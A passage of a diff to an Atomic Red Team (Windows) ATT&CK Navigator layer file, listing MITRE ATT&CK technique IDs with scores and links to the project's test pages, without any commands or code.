cs/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma
ster/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red
-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/re
dcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"te
chniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"technique
ID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enable
d":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"e
nabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enable
d":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://
github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics
